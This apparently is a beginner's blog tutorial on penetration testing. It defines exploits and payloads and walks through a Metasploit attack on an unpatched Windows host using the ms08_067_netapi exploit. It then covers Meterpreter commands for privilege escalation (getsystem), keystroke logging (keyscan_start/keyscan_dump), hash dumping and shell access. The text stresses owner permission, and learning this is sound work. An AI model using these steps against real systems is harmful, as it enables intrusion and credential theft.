Penetration Testing: Basic Guide For Beginners, Difference between hacking, etithical hacking and penetration testing

d

Penetration Testing: Basic Guide For Beginners

Now, hackers come in all shapes, sizes and colors. Hacking is a very wide term. And by the first sentence, I'm not referring to the physical characters of the hackers, I'm talking about the field of specialization. Believe me, there is a lot of work to do on the Wireless domain that we had been working on so far (we have only touched wireless networks for the time being - you are a beginner), but wireless hacking is but a small island in the vast sea of hacking. A relatively large landmass is unarguably Penetration Testing, and a large name in this context is Metasploit. So here's a guide which will give you a good idea about what Penetration testing is, and if you're feeling to lazy, I've got it summarized here.

Difference between hacking, etithical hacking and penetration testing

Hacker: simply a person who invades or interferes with another system with the intent to cause harm, without having any permission from the system owner.

Ethical hacker: a professional hired by an organization to review its security posture from the eyes of the hacker. Ethical hackers test vulnerabilities of the systems.

Penetration tester: a professional who goes a step beyond the ethical hacker and provides an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, either known and unknown hardware or software flaws, or operational weaknesses. These professionals are largely involved in remediation. The whole process involves a written consent and rules of engagement from the client, which clearly spell what they can or cannot do, "This is basically our 'get out of jail free' card," Bavisi says.

I am strongly recommend you to read my latest article to know more about hacking: Beginners Guide: What is Hacking and How to Become a Social Engineer

What is a penetration test?

What is penetration testing? Penetration testing, often called “pentesting”,“pen testing”, or “security testing”, is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Of course, you do this without actually harming the network. The person carrying out a penetration test is called a penetration tester or pentester.

• How legal is it?

Let’s make one thing crystal clear: Penetration testing requires that you get permission from the person who owns the system. Otherwise, you would be hacking the system, which is illegal in most countries – and trust me, you don’t look good in an orange jump suit (or maybe you do, still I don't recommend going to jail for it, buy one if you need it).In other words: The difference between penetration testing and hacking is whether you have the system owner’s permission. If you want to do a penetration test on someone else's system, it is highly recommended that you get written permission. Much better, get your virtual machine up and running, with your already acquired VMWare skills, and practice on your own system.

• What is a vulnerability?

A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities. (SQL injection is another topic I'd like to touch. Later maybe. I'm taking up too many tasks at hand at once.)

• What is security research?

Vulnerabilities are typically found by security researchers, which is a geeky term for smart people (how much we hackers love to call our self smart, especially the beginners who get too cocky) who like to find flaws in systems and break them.

• What is an exploit?

To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system. Exploits often deliver a payload to the target system to grant the attacker access to the system.

The Metasploit Project host the world’s largest public database of quality-assured exploits. Have a look at their exploit database – it’s right here on the site mentioned in the beginning of the article.

• What is a payload?

A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it’s a corny description, but you get the picture.Metasploit’s most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you’re feeling particularly bad-ass, you can even turn on a laptop’s webcam and be a fly on the wall.I would say that a payload is what exploits the 'exploit' and gives you some control over the exploited victim. Meterpreter is THE exploit, cause it doesn't give you 'some' control, it gives you ALL of it (that's some way to put it, yes,but not completely true. It still is the best payload. Beginners/noobs really enjoy the GUI feature available in this payload)

Getting Started With Penetration Testing

I see a lot of advice given to people when they ask the question "How do I get into pentesting?"The answer usually goes like use metasploit / armitage and exploit vulnerable XP systems. This approach is incorrect. Not completely, since stuff that actually works is bound to be more interesting than boring theory, but it is definitely not gonna help you in the long run. To get into penetration testing and bug spotting you first need to know what you're looking for. Tools will only take you so far, personally I don't think you should automate your pentesting until you can do it manually.

Now for the basic definitions of the terms related to penetration testing, here are a few resources that you should see. While I'm condemning the method of directly moving on to using tools, ironically, that's what we are going to do from the next tutorial onward. So before we get started, here are a set of websites that you might want to check which will give you an idea of what manual work do the tools automate. This information will be valuable once you start Penetration Testing secure networks for big security firms. Automated tools are not gonna help there.

Important Resources

• Web Penetration Testing Lab

Web applications have become common targets for attackers. Attackers can leverage relatively simple vulnerabilities to gain access to confidential information most likely containing personally identifiable information.While traditional firewalls and other network security controls are an important layer of any Information Security Program, they can’t defend or alert against many of the attack vectors specific to web applications. It is critical for an organisation to ensure that its web applications are not susceptible to common types of attack.

Best Practice suggests that an organisation should perform a web application test in addition to regular security assessments in order to ensure the security of its web applications.In this article i will explain to you a lists of common vulnerable web applications to built your first web penetration testing lab in Kali Linux.

Read more here

• Sql Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. 

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Read more here

• Metasploit

Metasploit is one of the most popular open source penetration testing frameworks available today. It offers tons of tools that range from scanning utilities to easy to launch exploits that include encoders used to bypass common security defenses. I’ll walk you through an example by compromising a Windows based authentication server that is not properly patched.

The easiest way to start using metasploit is to download a penetration testing arsenal that includes the metasploit framework such as Kali Linux. Kali Linux is an operating system designed for digital forensics and penetration testing . From Kali, you can run metasploit directly through command line, access a Metasploit GUI front end called Armitage or use Metasploit packages available in tools like the Social Engineering Toolset (SET). In my example, I’ll use the traditional command line.

Introduction to using Metasploit in Kali Linux

Metasploit is one of the most popular open source penetration testing frameworks available today. It offers tons of tools that range from scanning utilities to easy to launch exploits that include encoders used to bypass common security defenses. I’ll walk you through an example by compromising a Windows based authentication server that is not properly patched.

The easiest way to start using metasploit is to download a penetration testing arsenal that includes the metasploit framework such as Kali Linux. Kali Linux is an operating system designed for digital forensics and penetration testing .  From Kali, you can run metasploit directly through command line, access a Metasploit GUI front end called Armitage or use Metasploit packages available in tools like the Social Engineering Toolset (SET). In my example, I’ll use the traditional command line.

Read my preview article to setup Kali Linux: An Introduction To Hacker’s OS: Kali Linux And Setup Tutorial.

To start using Metasploit in CLI, open up a terminal, go to /opt/metasploit and type “msfconsole”. This brings up the msf > command prompt. Metasploit works by selecting a function defined in various folders such as windows exploits found under the exploit/windows/* folder. You can search the existing catalog of functions using “search” followed by a keyword such as searching RDP with hopes of finding a RDP based exploit. Its almost impossible to guess what exploit would work on a target so the typical use case is using a vulnerability scanner on a target to identify a weakness and matching that to an available exploit in Metasploit. For example, the next screenshots show running a NMAP scan followed running a Nessus vulnerability scan on a target to identify two critical vulnerabilities.

Scanning a target with Nmap

Running a Nessus scan on a target

I used the search function in Metasploit to identify one possible exploit that leverages the MS08067 vulnerability identified by Nessus. Metasploit includes ranking and the date of the exploit’s release via the MS(year). My exploit is dated as 2008 and has a “great” ranking meaning it is worth trying on my target.

Exploit found that matches vulnerability in Metasploit

To use an exploit, type “use” followed by the exploit. I’ll use the ms08_067_netapi exploit as explained earlier. This changes the Metasploit general command prompt to a specific exploit command prompt as shown in red text with the name of my selected exploit. Once here, it makes sense to see what options are available with the selected exploit. To see options, type “show options”. My example shows I need to specify the target via remote host as well as can customize things such as the remote port, which I’ll leave everything default expect the target that is blank. I can change the RHOST settings using the “set” command as shown in the next example. Once the exploit is configured, type “exploit” to launch the exploit.

Configuring and using the ms08_067_netapi exploit

If things work, I should establish a connection with a victim using the meterpreter console showing the metepreter > prompt. This doesn’t create a new process on the target system aka it runs in the context of the process being exploited. I can view the available commands using the “help” keyword, which includes anything from downloading files, modifying route tables or even identifying and taking a snap shot from a connected webcam. Available commands can vary based on the privilege level accessed. Those commands are labeled “Priv”, such as the ability to grab hash dumps of the SAM file containing passwords. An common example ran from the meterpreter is logging all keystrokes with the goal of capturing passwords. This is done using the “keyscan_start” to start the sniffer and “keyscan_dump” to see what was captured. The options to cause havoc on a compromised system are endless.

Running an exploit successfully in Metasploit

A common starting point once inside a system is checking what privilege level you have established with the compromised system using the “getuid” command. If you are not at the highest level such as SYSTEM or ROOT, you could attempt to escalate your privilege level using the “getsystem” command. My example got SYSTEM access using the initial exploit.

Checking privilege level in meterpreter

To navigate a compromised windows system, you can open a shell using the “shell” command as shown in the next example. You can also find file system commands available in the meterpreter console that do similar activities such as “pwd” to see what directory you are in or “download [file path]” to download files from the compromised target.

Access Windows Shell from meterpreter

Checking system info on compromised system

Metasploit has tons of other applications such as Fuzzing and Spoofing however there aremore tools available in Kali Linux that may be better for those purposes. Check out metasploit.com for more tutorials and other useful information.